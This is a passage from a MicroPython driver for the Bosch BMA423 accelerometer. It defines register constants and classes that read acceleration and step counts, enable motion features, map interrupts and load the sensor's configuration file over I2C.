const(400)\nBMA42X_ST_ACC_Y_AXIS_SIGNAL_DIFF\t= const(800)\nBMA42X_ST_ACC_Z_AXIS_SIGNAL_DIFF\t= const(400)\n\n# Self-test: Resulting minimum difference signal in mg for BMA45x \nBMA45X_ST_ACC_X_AXIS_SIGNAL_DIFF\t= const(1800)\nBMA45X_ST_ACC_Y_AXIS_SIGNAL_DIFF\t= const(1800)\nBMA45X_ST_ACC_Z_AXIS_SIGNAL_DIFF\t= const(1800)\n\n# \tERROR STATUS POSITION AND MASK\nBMA4_FATAL_ERR_MSK\t\t= const(0x01)\nBMA4_CMD_ERR_POS\t\t= const(1)\nBMA4_CMD_ERR_MSK\t\t= const(0x02)\nBMA4_ERR_CODE_POS\t\t= const(2)\nBMA4_ERR_CODE_MSK\t\t= const(0x1C)\nBMA4_FIFO_ERR_POS\t\t= const(6)\nBMA4_FIFO_ERR_MSK\t\t= const(0x40)\nBMA4_AUX_ERR_POS\t\t= const(7)\nBMA4_AUX_ERR_MSK\t\t= const(0x80)\n\n# \tMaximum number of bytes to be read from the sensor \nBMA4_MAX_BUFFER_SIZE = const(81)\n\n# \tNV_CONFIG POSITION AND MASK\n# NV_CONF Description - Reg Addr --> (0x70), Bit --> 3 \nBMA4_NV_ACCEL_OFFSET_POS\t= const(3)\nBMA4_NV_ACCEL_OFFSET_MSK\t= const(0x08)\n\n# \tMAG DATA XYZ POSITION AND MASK\nBMA4_DATA_MAG_X_LSB_POS\t\t= const(3)\nBMA4_DATA_MAG_X_LSB_MSK\t\t= const(0xF8)\nBMA4_DATA_MAG_Y_LSB_POS\t\t= const(3)\nBMA4_DATA_MAG_Y_LSB_MSK\t\t= const(0xF8)\nBMA4_DATA_MAG_Z_LSB_POS\t\t= const(1)\nBMA4_DATA_MAG_Z_LSB_MSK\t\t= const(0xFE)\nBMA4_DATA_MAG_R_LSB_POS\t\t= const(2)\nBMA4_DATA_MAG_R_LSB_MSK\t\t= const(0xFC)\n\n# ACCEL DATA READY POSITION AND MASK\nBMA4_STAT_DATA_RDY_ACCEL_POS\t= const(7)\nBMA4_STAT_DATA_RDY_ACCEL_MSK\t= const(0x80)\n\n# MAG DATA READY POSITION AND MASK\nBMA4_STAT_DATA_RDY_MAG_POS\t= const(5)\nBMA4_STAT_DATA_RDY_MAG_MSK\t= const(0x20)\n\n# ADVANCE POWER SAVE POSITION AND MASK\nBMA4_ADVANCE_POWER_SAVE_MSK\t= const(0x01)\n\n# ACCELEROMETER ENABLE POSITION AND MASK\nBMA4_ACCEL_ENABLE_POS\t\t= const(2)\nBMA4_ACCEL_ENABLE_MSK\t\t= const(0x04)\n\n# MAGNETOMETER ENABLE POSITION AND MASK\nBMA4_MAG_ENABLE_MSK\t\t= const(0x01)\n\n# \tACCEL CONFIGURATION POSITION AND MASK\nBMA4_ACCEL_ODR_MSK\t\t\t= const(0x0F)\nBMA4_ACCEL_BW_POS\t\t\t= const(4)\nBMA4_ACCEL_BW_MSK\t\t\t= const(0x70)\nBMA4_ACCEL_RANGE_MSK\t\t\t= const(0x03)\nBMA4_ACCEL_PERFMODE_POS\t\t\t= const(7)\nBMA4_ACCEL_PERFMODE_MSK\t\t\t= const(0x80)\n\n# \tMAG CONFIGURATION POSITION AND MASK\nBMA4_MAG_CONFIG_OFFSET_POS\t\t= const(4)\nBMA4_MAG_CONFIG_OFFSET_LEN\t\t= const(4)\nBMA4_MAG_CONFIG_OFFSET_MSK\t\t= const(0xF0)\nBMA4_MAG_CONFIG_OFFSET_REG\t\t= 
BMA4_AUX_CONFIG_ADDR\n\n# FIFO SELF WAKE UP POSITION AND MASK\nBMA4_FIFO_SELF_WAKE_UP_POS\t= const(1)\nBMA4_FIFO_SELF_WAKE_UP_MSK\t= const(0x02)\n\n# \tFIFO BYTE COUNTER POSITION AND MASK\nBMA4_FIFO_BYTE_COUNTER_MSB_MSK\t= const(0x3F)\n\n# \tFIFO DATA POSITION AND MASK\nBMA4_FIFO_DATA_POS\t\t= const(0)\nBMA4_FIFO_DATA_MSK\t\t= const(0xFF)\n\n# \tFIFO FILTER FOR ACCEL POSITION AND MASK\nBMA4_FIFO_DOWN_ACCEL_POS\t\t= const(4)\nBMA4_FIFO_DOWN_ACCEL_MSK\t\t= const(0x70)\nBMA4_FIFO_FILTER_ACCEL_POS\t\t= const(7)\nBMA4_FIFO_FILTER_ACCEL_MSK\t\t= const(0x80)\n\n# \tFIFO HEADER DATA DEFINITIONS \nFIFO_HEAD_A\t\t\t\t\t= const(0x84)\nFIFO_HEAD_M\t\t\t\t\t= const(0x90)\nFIFO_HEAD_M_A\t\t\t\t= const(0x94)\nFIFO_HEAD_SENSOR_TIME\t\t= const(0x44)\nFIFO_HEAD_INPUT_CONFIG\t\t= const(0x48)\nFIFO_HEAD_SKIP_FRAME\t\t= const(0x40)\nFIFO_HEAD_OVER_READ_MSB\t\t= const(0x80)\nFIFO_HEAD_SAMPLE_DROP\t\t= const(0x50)\n\n# \tFIFO HEADERLESS MODE DATA ENABLE DEFINITIONS \nBMA4_FIFO_M_A_ENABLE\t\t= const(0x60)\nBMA4_FIFO_A_ENABLE\t\t\t= const(0x40)\nBMA4_FIFO_M_ENABLE\t\t\t= const(0x20)\n\n# \tFIFO CONFIGURATION SELECTION \nBMA4_FIFO_STOP_ON_FULL\t\t= const(0x01)\nBMA4_FIFO_TIME\t\t\t\t= const(0x02)\nBMA4_FIFO_TAG_INTR2\t\t\t= const(0x04)\nBMA4_FIFO_TAG_INTR1\t\t\t= const(0x08)\nBMA4_FIFO_HEADER\t\t\t= const(0x10)\nBMA4_FIFO_MAG\t\t\t\t= const(0x20)\nBMA4_FIFO_ACCEL\t\t\t\t= const(0x40)\nBMA4_FIFO_ALL\t\t\t\t= const(0x7F)\nBMA4_FIFO_CONFIG_0_MASK\t\t= const(0x03)\nBMA4_FIFO_CONFIG_1_MASK\t\t= const(0xFC)\n\n# \tFIFO FRAME COUNT DEFINITION \nFIFO_LSB_CONFIG_CHECK\t\t= const(0x00)\nFIFO_MSB_CONFIG_CHECK\t\t= const(0x80)\nBMA4_FIFO_TAG_INTR_MASK\t\t= const(0xFC)\n\n# \tFIFO DROPPED FRAME DEFINITION \nAUX_FIFO_DROP\t\t\t\t= const(0x04)\nACCEL_AUX_FIFO_DROP\t\t\t= const(0x05)\nACCEL_FIFO_DROP\t\t\t\t= const(0x01)\n\n# FIFO MAG DEFINITION\nBMA4_MA_FIFO_A_X_LSB\t= const(8)\n\n# FIFO sensor time length definitions\nBMA4_SENSOR_TIME_LENGTH\t\t= const(3)\n\n# FIFO LENGTH DEFINITION\nBMA4_FIFO_A_LENGTH\t\t\t= const(6)\nBMA4_FIFO_M_LENGTH\t\t\t= const(8)\nBMA4_FIFO_MA_LENGTH\t\t\t= const(14)\n\n# \tMAG I2C ADDRESS SELECTION POSITION AND MASK\nBMA4_I2C_DEVICE_ADDR_POS\t\t= const(1)\nBMA4_I2C_DEVICE_ADDR_MSK\t\t= const(0xFE)\n\n# MAG CONFIGURATION FOR SECONDARY INTERFACE POSITION AND MASK\nBMA4_MAG_BURST_MSK\t\t\t= const(0x03)\nBMA4_MAG_MANUAL_ENABLE_POS\t\t= const(7)\nBMA4_MAG_MANUAL_ENABLE_MSK\t\t= const(0x80)\nBMA4_READ_ADDR_MSK\t\t\t= const(0xFF)\nBMA4_WRITE_ADDR_MSK\t\t\t= const(0xFF)\nBMA4_WRITE_DATA_MSK\t\t\t= const(0xFF)\n\n# \tOUTPUT TYPE ENABLE POSITION AND MASK\nBMA4_INT_EDGE_CTRL_MASK\t\t\t= const(0x01)\nBMA4_INT_EDGE_CTRL_POS\t\t\t= const(0x00)\nBMA4_INT_LEVEL_MASK\t\t\t\t= const(0x02)\nBMA4_INT_LEVEL_POS\t\t\t\t= const(0x01)\nBMA4_INT_OPEN_DRAIN_MASK\t\t= const(0x04)\nBMA4_INT_OPEN_DRAIN_POS\t\t\t= const(0x02)\nBMA4_INT_OUTPUT_EN_MASK\t\t\t= const(0x08)\nBMA4_INT_OUTPUT_EN_POS\t\t\t= const(0x03)\nBMA4_INT_INPUT_EN_MASK\t\t\t= const(0x10)\nBMA4_INT_INPUT_EN_POS\t\t\t= const(0x04)\n\n# \tIF CONFIG POSITION AND MASK\nBMA4_CONFIG_SPI3_MSK\t\t\t= const(0x01)\nBMA4_IF_CONFIG_IF_MODE_POS\t\t= const(4)\nBMA4_IF_CONFIG_IF_MODE_MSK\t\t= const(0x10)\n\n# \tACCEL SELF TEST POSITION AND MASK\nBMA4_ACCEL_SELFTEST_ENABLE_MSK\t= const(0x01)\nBMA4_ACCEL_SELFTEST_SIGN_POS\t= const(2)\nBMA4_ACCEL_SELFTEST_SIGN_MSK\t= const(0x04)\nBMA4_SELFTEST_AMP_POS\t\t\t= const(3)\nBMA4_SELFTEST_AMP_MSK\t\t\t= const(0x08)\n\n# \tACCEL ODR \nBMA4_OUTPUT_DATA_RATE_0_78HZ\t= const(0x01)\nBMA4_OUTPUT_DATA_RATE_1_56HZ\t= 
const(0x02)\nBMA4_OUTPUT_DATA_RATE_3_12HZ\t= const(0x03)\nBMA4_OUTPUT_DATA_RATE_6_25HZ\t= const(0x04)\nBMA4_OUTPUT_DATA_RATE_12_5HZ\t= const(0x05)\nBMA4_OUTPUT_DATA_RATE_25HZ\t\t= const(0x06)\nBMA4_OUTPUT_DATA_RATE_50HZ\t\t= const(0x07)\nBMA4_OUTPUT_DATA_RATE_100HZ\t\t= const(0x08)\nBMA4_OUTPUT_DATA_RATE_200HZ\t\t= const(0x09)\nBMA4_OUTPUT_DATA_RATE_400HZ\t\t= const(0x0A)\nBMA4_OUTPUT_DATA_RATE_800HZ\t\t= const(0x0B)\nBMA4_OUTPUT_DATA_RATE_1600HZ\t= const(0x0C)\n\n# \tACCEL BANDWIDTH PARAMETER \nBMA4_ACCEL_OSR4_AVG1\t\t= const(0)\nBMA4_ACCEL_OSR2_AVG2\t\t= const(1)\nBMA4_ACCEL_NORMAL_AVG4\t = const(2)\nBMA4_ACCEL_CIC_AVG8\t\t\t= const(3)\nBMA4_ACCEL_RES_AVG16\t\t= const(4)\nBMA4_ACCEL_RES_AVG32\t\t= const(5)\nBMA4_ACCEL_RES_AVG64\t\t= const(6)\nBMA4_ACCEL_RES_AVG128\t\t= const(7)\n\n# \tACCEL PERFMODE PARAMETER \nBMA4_CIC_AVG_MODE\t\t\t= const(0)\nBMA4_CONTINUOUS_MODE\t\t= const(1)\n\n# \tMAG OFFSET \nBMA4_MAG_OFFSET_MAX\t\t= const(0x00)\n\n# \tENABLE/DISABLE SELECTIONS \nBMA4_X_AXIS\t\t= const(0)\nBMA4_Y_AXIS\t\t= const(1)\nBMA4_Z_AXIS\t\t= const(2)\n\n# SELF TEST\nBMA4_SELFTEST_PASS\t\t\t\t= const(0)\nBMA4_SELFTEST_FAIL\t\t\t\t= const(1)\n\n# INTERRUPT MAPS \nBMA4_INTR1_MAP\t\t= const(0)\nBMA4_INTR2_MAP\t\t= const(1)\n\n# \tINTERRUPT MASKS \nBMA4_FIFO_FULL_INT\t\t\t= const(0x0100)\nBMA4_FIFO_WM_INT\t\t\t= const(0x0200)\nBMA4_DATA_RDY_INT\t\t\t= const(0x0400)\nBMA4_MAG_DATA_RDY_INT\t\t= const(0x2000)\nBMA4_ACCEL_DATA_RDY_INT\t\t= const(0x8000)\n\n\n# \tAKM POWER MODE SELECTION \nAKM_POWER_DOWN_MODE\t\t\t= const(0)\nAKM_SINGLE_MEAS_MODE\t\t= const(1)\n\n# \tSECONDARY_MAG POWER MODE SELECTION \nBMA4_MAG_FORCE_MODE\t\t\t= const(0)\nBMA4_MAG_SUSPEND_MODE\t\t= const(1)\n\n# \tMAG POWER MODE SELECTION \nFORCE_MODE\t\t\t= const(0)\nSUSPEND_MODE\t\t= const(1)\n\n# \tACCEL POWER MODE \nACCEL_MODE_NORMAL\t= const(0x11)\n\n# \tMAG POWER MODE \nMAG_MODE_SUSPEND\t\t= const(0x18)\n\n# \tENABLE/DISABLE BIT VALUES \nBMA4_ENABLE\t\t\t= const(0x01)\nBMA4_DISABLE\t\t= const(0x00)\n\n# \tDEFINITION USED FOR DIFFERENT WRITE \nBMA4_MANUAL_DISABLE\t\t\t= const(0x00)\nBMA4_MANUAL_ENABLE\t\t\t= const(0x01)\nBMA4_ENABLE_MAG_IF_MODE\t\t= const(0x01)\nBMA4_MAG_DATA_READ_REG\t\t= const(0x0A)\nBMA4_BMM_POWER_MODE_REG\t\t= const(0x06)\nBMA4_SEC_IF_NULL\t\t\t= const(0)\nBMA4_SEC_IF_BMM150\t\t\t= const(1)\nBMA4_SEC_IF_AKM09916\t\t= const(2)\nBMA4_ENABLE_AUX_IF_MODE\t\t= const(0x01)\n\n# \tSENSOR RESOLUTION \nBMA4_12_BIT_RESOLUTION\t\t= const(12)\nBMA4_14_BIT_RESOLUTION\t\t= const(14)\nBMA4_16_BIT_RESOLUTION = const(16)\n\n# MULTIPLIER \n# for handling micro-g values \nBMA4XY_MULTIPLIER = const(1000000)\n# for handling float temperature values \nBMA4_SCALE_TEMP = const(1000)\n# BMA4_FAHREN_SCALED = 1.8 * 1000 \nBMA4_FAHREN_SCALED\t = const(1800)\n# BMA4_KELVIN_SCALED = 273.15 * 1000 \nBMA4_KELVIN_SCALED\t = const(273150)\n\n\n########################################### defines specific to BMA423\n\n# Chip ID of BMA423 sensor \nBMA423_CHIP_ID\t\t\t\t= const(0x13)\n\n# Sensor feature size \nBMA423_FEATURE_SIZE\t\t\t= const(64)\nBMA423_ANYMOTION_EN_LEN\t\t\t= const(2)\nBMA423_RD_WR_MIN_LEN\t\t\t= const(2)\n\n# Feature offset address \nBMA423_ANY_NO_MOTION_OFFSET\t\t= const(0x00)\nBMA423_STEP_CNTR_OFFSET\t\t\t= const(0x36)\nBMA423_STEP_CNTR_PARAM_OFFSET\t\t= const(0x04)\nBMA423_WAKEUP_OFFSET\t\t\t= const(0x38)\nBMA423_TILT_OFFSET\t\t\t= const(0x3A)\nBMA423_CONFIG_ID_OFFSET\t\t\t= const(0x3C)\nBMA423_AXES_REMAP_OFFSET\t\t= const(0x3E)\n\n\n\n\n#************************************************************\n#\tRemap Axes 
\n#*************************************************************\nBMA423_X_AXIS_MASK\t\t\t= const(0x03)\nBMA423_X_AXIS_SIGN_MASK\t\t\t= const(0x04)\nBMA423_Y_AXIS_MASK\t\t\t= const(0x18)\nBMA423_Y_AXIS_SIGN_MASK\t\t\t= const(0x20)\nBMA423_Z_AXIS_MASK\t\t\t= const(0xC0)\nBMA423_Z_AXIS_SIGN_MASK\t\t\t= const(0x01)\n\n#*************************************************************\n#\tStep Counter & Detector \n#*************************************************************\n# Step counter enable macros \n#\nBMA423_STEP_CNTR_EN_POS\t\t\t= const(4)\nBMA423_STEP_CNTR_EN_MSK\t\t\t= const(0x10)\nBMA423_ACTIVITY_EN_MSK\t\t\t= const(0x20)\n\n# Step counter watermark macros \nBMA423_STEP_CNTR_WM_MSK\t\t\t= const(0x03FF)\n\n# Step counter reset macros \nBMA423_STEP_CNTR_RST_POS\t\t= const(2)\nBMA423_STEP_CNTR_RST_MSK\t\t= const(0x04)\n\n# Step detector enable macros \nBMA423_STEP_DETECTOR_EN_POS\t\t= const(3)\nBMA423_STEP_DETECTOR_EN_MSK\t\t= const(0x08)\n\n# Tilt enable macros \nBMA423_TILT_EN_MSK\t\t\t= const(0x01)\n\n# Step count output length\nBMA423_STEP_CNTR_DATA_SIZE\t\t= const(4)\n\n# Wakeup enable macros \nBMA423_WAKEUP_EN_MSK\t\t\t= const(0x01)\n\n# Wake up sensitivity macros \nBMA423_WAKEUP_SENS_POS\t\t\t= const(1)\nBMA423_WAKEUP_SENS_MSK\t\t\t= const(0x0E)\n\n# Tap selection macro \nBMA423_TAP_SEL_POS\t\t\t= const(4)\nBMA423_TAP_SEL_MSK\t\t\t= const(0x10)\n\n#*************************************************************\n#\tAny Motion \n#*************************************************************\n# Any motion threshold macros \nBMA423_ANY_NO_MOTION_THRES_POS\t\t= const(0)\nBMA423_ANY_NO_MOTION_THRES_MSK\t\t= const(0x07FF)\n\n# Any motion selection macros \nBMA423_ANY_NO_MOTION_SEL_POS\t\t= const(3)\nBMA423_ANY_NO_MOTION_SEL_MSK\t\t= const(0x08)\n\n# Any motion enable macros \nBMA423_ANY_NO_MOTION_AXIS_EN_POS\t= const(5)\nBMA423_ANY_NO_MOTION_AXIS_EN_MSK\t= const(0xE0)\n\n# Any motion duration macros \nBMA423_ANY_NO_MOTION_DUR_MSK\t\t= const(0x1FFF)\n\n#*************************************************************\n#\tUser macros \n#*************************************************************\n\n# Anymotion/Nomotion axis enable macros \nBMA423_X_AXIS_EN\t\t\t= const(0x01)\nBMA423_Y_AXIS_EN\t\t\t= const(0x02)\nBMA423_Z_AXIS_EN\t\t\t= const(0x04)\nBMA423_ALL_AXIS_EN\t\t\t= const(0x07)\nBMA423_ALL_AXIS_DIS\t\t\t= const(0x00)\n\n# Feature enable macros for the sensor \nBMA423_STEP_CNTR\t\t\t= const(0x01)\n# Below macros are mutually exclusive \nBMA423_ANY_MOTION\t\t\t= const(0x02)\nBMA423_NO_MOTION\t\t\t= const(0x04)\nBMA423_ACTIVITY\t\t\t\t= const(0x08)\nBMA423_TILT\t\t\t\t\t= const(0x10)\nBMA423_WAKEUP\t\t\t\t= const(0x20)\n\n# Interrupt status macros \nBMA423_STEP_CNTR_INT\t\t\t= const(0x02)\nBMA423_ACTIVITY_INT\t\t\t= const(0x04)\nBMA423_TILT_INT\t\t\t\t= const(0x08)\nBMA423_WAKEUP_INT\t\t\t= const(0x20)\nBMA423_ANY_NO_MOTION_INT\t\t= const(0x40)\nBMA423_ERROR_INT\t\t\t= const(0x80)\n\n# Activity recognition macros \nBMA423_USER_STATIONARY\t\t\t= const(0x00)\nBMA423_USER_WALKING\t\t\t= const(0x01)\nBMA423_USER_RUNNING\t\t\t= const(0x02)\nBMA423_STATE_INVALID\t\t\t= const(0x03)\n\n# Configuration selection macros \nBMA423_PHONE_CONFIG\t\t\t= const(0x00)\nBMA423_WRIST_CONFIG\t\t\t= const(0x01)\n\nfeature_data={ \n 'step_cntr': (BMA423_STEP_CNTR_OFFSET+1 , BMA423_STEP_CNTR_EN_MSK),\n 'activity': (BMA423_STEP_CNTR_OFFSET+1 , BMA423_ACTIVITY_EN_MSK),\n 'tilt': (BMA423_TILT_OFFSET, BMA423_TILT_EN_MSK),\n 'wakeup': (BMA423_WAKEUP_OFFSET, BMA423_WAKEUP_EN_MSK),\n 'no_motion': (1, 
BMA423_ANY_NO_MOTION_SEL_MSK), \n 'any_motion': (1, BMA423_ANY_NO_MOTION_SEL_MSK)\n } \n\n\nBMA423_PHONE_SC_PARAM = [ 0x132 , 0x78E6 , 0x84 , 0x6C9C , 0x07 , 0x7564 , 0x7EAA , 0x55F , 0xABE , 0x55F , 0xE896 ,\n 0x41EF , 0x01 , 0x0C , 0x0C , 0x4A , 0xA0 , 0x00 , 0x0C , 0x3CF0 , 0x100 , 0x00 , 0x00 , 0x00 , 0x00 ]\n\n\n# Step counter parameter setting(1-25) for wrist (Default) \nBMA423_WRIST_SC_PARAM = [ 0x12D ,0x7BD4 ,0x13B ,0x7ADB ,0x04 ,0x7B3F ,0x6CCD ,0x4C3 ,0x985 \n , 0x4C3 ,0xE6EC ,0x460C ,0x01 ,0x27 ,0x19 ,0x96 ,0xA0 ,0x01 ,0x0C ,0x3CF0 \n , 0x100 ,0x01 ,0x03 ,0x01 ,0x0E ] \n \n# BMA423_RW_LEN = const(32) \nBMA423_RW_LEN = const(8) \n\nclass BMA4Error(Exception):\n pass\n\nclass BMA4:\n def __init__(self, i2c, address=BMA4_I2C_ADDR_SECONDARY):\n self.address=address\n self.bus=i2c\n self.buffer = bytearray(100)\n self.mv = memoryview(self.buffer)\n self.bytebuf = self.mv[82:83]\n self.wordbuf = self.mv[82:84]\n self.confbuf = self.mv[0:BMA423_RW_LEN]\n self.chip_id= self.read_byte(BMA4_CHIP_ID_ADDR)\n # self.write_byte(BMA4_CMD_ADDR, 0xb6 )\n time.sleep_ms(20)\n \n\n def write_byte(self, reg, val):\n self.bytebuf[0] = val\n #print(\"write byte %02x %02x\" % (reg,val) )\n self.bus.writeto_mem(self.address, reg, self.bytebuf)\n\n def read_byte(self, reg):\n self.bus.readfrom_mem_into(self.address, reg, self.bytebuf)\n #print(\"read byte %02x %02x\" % (reg,self.bytebuf[0]) )\n return self.bytebuf[0]\n \n def write_data(self, reg, data):\n #print(\"write data %02x len=%d \" % (reg,len(data)),end=\" \")\n #for k in data:\n # print(hex(k),end=\" \")\n #print(\".\") \n self.bus.writeto_mem(self.address, reg, data)\n\n def read_data(self, reg, len):\n self.bus.readfrom_mem_into(self.address, reg, self.mv[0:len])\n return self.mv[0:len]\n\n def stream_transfer_write(self,data):\n asic_msb= 0xff & ( self.streamindex // 32 )\n asic_lsb= 0x0f & ( self.streamindex // 2 ) \n self.write_byte(BMA4_RESERVED_REG_5B_ADDR,asic_lsb)\n self.write_byte(BMA4_RESERVED_REG_5C_ADDR,asic_msb)\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n self.streamindex += len(data)\n \n def readbit(self,addr,mask,pos):\n return (self.read_byte(addr) & mask ) >> pos \n\n def writebit(self,addr,mask,pos,value):\n tmp=self.read_byte(addr)\n if value != 0:\n tmp |= mask\n else:\n tmp &= ~mask\n self.write_byte(addr,tmp)\n \n @property\n def accel_enable(self):\n return self.readbit(BMA4_POWER_CTRL_ADDR,BMA4_ACCEL_ENABLE_MSK,BMA4_ACCEL_ENABLE_POS) \n \n @accel_enable.setter\n def accel_enable(self,value):\n self.writebit(BMA4_POWER_CTRL_ADDR,BMA4_ACCEL_ENABLE_MSK,BMA4_ACCEL_ENABLE_POS,value)\n \n @property\n def advance_power_save(self):\n return self.read_byte(BMA4_POWER_CONF_ADDR) & BMA4_ADVANCE_POWER_SAVE_MSK\n \n @advance_power_save.setter\n def advance_power_save(self,value):\n pwr=self.read_byte(BMA4_POWER_CONF_ADDR)\n #print(\"apm is \",pwr,\"setting to\",value) \n if value != 0:\n pwr |= BMA4_ADVANCE_POWER_SAVE_MSK\n else:\n pwr &= ~BMA4_ADVANCE_POWER_SAVE_MSK \n self.write_byte(BMA4_POWER_CONF_ADDR,pwr)\n #print(\"apm writing \",pwr) \n time.sleep_ms(1)\n\n def get_feature_config_start_addr(self):\n self.asic_lsb=self.read_byte(BMA4_RESERVED_REG_5B_ADDR) & 0xf\n self.asic_msb=self.read_byte(BMA4_RESERVED_REG_5C_ADDR)\n \n \n def write_config_file(self,fn):\n self.advance_power_save=0\n asic=self.read_byte(BMA4_INTERNAL_STAT)\n #print(\"asic status=\",asic)\n \n self.write_byte(BMA4_INIT_CTRL_ADDR, 0x0);\n \n self.streamindex=0x0000\n with open(fn,\"rb\") as f:\n nread=f.readinto(self.confbuf)\n while nread > 0:\n 
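# Hedged note (inferred from stream_transfer_write above, following Bosch's reference bma4 driver):\n # the feature-config blob must land at increasing offsets, so before each chunk is written to the\n # feature-config register 0x5E, the half-word write index is re-programmed via the reserved\n # registers 0x5B (low nibble) and 0x5C (high byte).\n 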
self.stream_transfer_write(self.mv[0:nread])\n nread=f.readinto(self.confbuf)\n time.sleep_ms(10)\n self.write_byte(BMA4_INIT_CTRL_ADDR, 0x01);\n #for i in range(0,5):\n # time.sleep_ms(50)\n # asic=self.read_byte(BMA4_INTERNAL_STAT)\n # print(\"asic status=\",asic)\n time.sleep_ms(160)\n asic=self.read_byte(BMA4_INTERNAL_STAT)\n if asic != BMA4_ASIC_INITIALIZED:\n raise BMA4Error(\"could not initialize asic %02x\" % asic )\n self.advance_power_save=1\n self.get_feature_config_start_addr()\n print(\"* BMA423 ASIC initialized\")\n\n def read_accel(self):\n bt=self.read_data(BMA4_DATA_8_ADDR,6)\n # three signed 16-bit little-endian words: x, y, z\n xyzraw=unpack(\"<hhh\", bt)\n return xyzraw\n\n def feature_config(self,params):\n # pack the 16-bit parameter words little-endian and write them to the feature-config area\n data=bytearray(2 * len(params))\n index=0\n for word in params:\n msb = 0xff & ( word >> 8 )\n lsb = 0xff & word\n data[index] = lsb\n data[index+1]= msb\n index += 2\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n \n @property\n def accel_range(self):\n tmp=self.read_byte(BMA4_ACCEL_CONFIG_ADDR + 1) & BMA4_ACCEL_RANGE_MSK\n range= 2 << tmp # 0 is 2G, 1 is 4G, 2 is 8G, 3 is 16G\n return range\n \n @staticmethod \n def bit_length(val):\n cnt=0\n while val != 0:\n cnt+=1\n val >>= 1\n return cnt \n \n @accel_range.setter \n def accel_range(self,val):\n range=(self.bit_length(val)-2) & BMA4_ACCEL_RANGE_MSK\n tmp=self.read_byte(BMA4_ACCEL_CONFIG_ADDR + 1) & ~BMA4_ACCEL_RANGE_MSK\n tmp |= range\n self.write_byte(BMA4_ACCEL_CONFIG_ADDR + 1,tmp)\n \n \n @property \n def step_count(self):\n data=self.read_data(BMA4_STEP_CNT_OUT_0_ADDR, BMA423_STEP_CNTR_DATA_SIZE)\n # unsigned 32-bit little-endian step counter\n sc=unpack(\"<I\", data)[0]\n return sc\n\n @property\n def step_dedect_enabled(self):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, BMA423_FEATURE_SIZE)\n return (data[BMA423_STEP_CNTR_OFFSET + 1] & BMA423_STEP_DETECTOR_EN_MSK) >> BMA423_STEP_DETECTOR_EN_POS\n\n @step_dedect_enabled.setter\n def step_dedect_enabled(self,value):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, BMA423_FEATURE_SIZE)\n tmp=data[BMA423_STEP_CNTR_OFFSET + 1]\n if value != 0:\n #print(\"step detect enabled\")\n tmp |= BMA423_STEP_DETECTOR_EN_MSK\n else:\n tmp &= ~BMA423_STEP_DETECTOR_EN_MSK\n data[BMA423_STEP_CNTR_OFFSET + 1]=tmp\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n\n\n def feature_enable(self,feature,value=1):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, BMA423_FEATURE_SIZE)\n if feature not in feature_data:\n raise BMA4Error(\"no such feature %s \" % feature ) \n # feature_data maps each feature name to an (offset, mask) pair\n offset, mask=feature_data[feature]\n tmp=data[offset]\n if feature == 'any_motion':\n if value != 0:\n tmp &= ~mask\n else:\n tmp |= mask\n else:\n if value != 0:\n tmp |= mask\n else:\n tmp &= ~mask\n data[offset]=tmp\n if feature== 'any_motion' or feature=='no_motion':\n data[3] = data[3] & ( ~BMA423_ANY_NO_MOTION_AXIS_EN_MSK)\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n\n def feature_anymotion_axis(self,axis):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, 4)\n tmp=data[3]\n tmp &= (~BMA423_ANY_NO_MOTION_AXIS_EN_MSK)\n for i,a in enumerate(['x','y','z']):\n if a in axis:\n tmp |= 1 << (BMA423_ANY_NO_MOTION_AXIS_EN_POS + i)\n data[3]=tmp\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n\n\n\n @property \n def step_watermark(self):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, BMA423_FEATURE_SIZE)\n wmlsb=data[BMA423_STEP_CNTR_OFFSET]\n wmmsb=data[BMA423_STEP_CNTR_OFFSET+1]\n wm= ( wmlsb + (wmmsb << 8 ) ) & BMA423_STEP_CNTR_WM_MSK \n return wm\n\n @step_watermark.setter\n def step_watermark(self,value):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, BMA423_FEATURE_SIZE)\n wmlsb=data[BMA423_STEP_CNTR_OFFSET]\n wmmsb=data[BMA423_STEP_CNTR_OFFSET+1]\n wm= ( wmlsb + (wmmsb << 8 ) ) & ~BMA423_STEP_CNTR_WM_MSK \n wm |= ( value & BMA423_STEP_CNTR_WM_MSK)\n \n data[BMA423_STEP_CNTR_OFFSET] = wm & 0xff\n data[BMA423_STEP_CNTR_OFFSET + 1] = ( wm >> 8 ) & 0xff\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n \n def int_status(self):\n is0=self.read_byte(BMA4_INT_STAT_0_ADDR)\n 
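# By the register map above, INT_STAT_0 (0x1C) carries the feature interrupts (step counter,\n # activity, tilt, wakeup, any/no-motion; see the BMA423_*_INT masks) while INT_STAT_1 (0x1D)\n # carries the fifo and data-ready flags.\n 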
is1=self.read_byte(BMA4_INT_STAT_1_ADDR)\n return (is0,is1)\n \n def map_int(self,line,intr,unmap=False):\n # route (or un-route, if unmap is set) the given interrupt mask to the INT1/INT2 pin\n addr=[BMA4_INT_MAP_1_ADDR,BMA4_INT_MAP_2_ADDR][line]\n val=self.read_byte(addr)\n mask= intr & 0xff\n val &= ~mask\n if not unmap:\n val |= intr\n self.write_byte(addr,val)\n \n \n \n\nclass BMA423(BMA4):\n def __init__(self, i2c, address=BMA4_I2C_ADDR_SECONDARY):\n super(BMA423,self).__init__(i2c,address)\n if self.chip_id != BMA423_CHIP_ID:\n raise BMA4Error(\"chip id should be %02x instead of %02x\" % (BMA423_CHIP_ID,self.chip_id) )\n else:\n print(\"* BMA423 detected\")\n self.resolution = 12\n self.feature_len = BMA423_FEATURE_SIZE\n self.variant = 1\n self.write_config_file()\n self.feature_config(BMA423_WRIST_SC_PARAM)\n self.write_byte(BMA4_INT1_IO_CTRL_ADDR,5) # level trigger, output enable\n self.write_byte(BMA4_INT2_IO_CTRL_ADDR,5)\n self.write_byte(BMA4_INTR_LATCH_ADDR,BMA4_LATCH_MODE)\n\n def write_config_file(self,fn=\"bma423.fw\"):\n super(BMA423,self).write_config_file(fn)\n\n\n\n 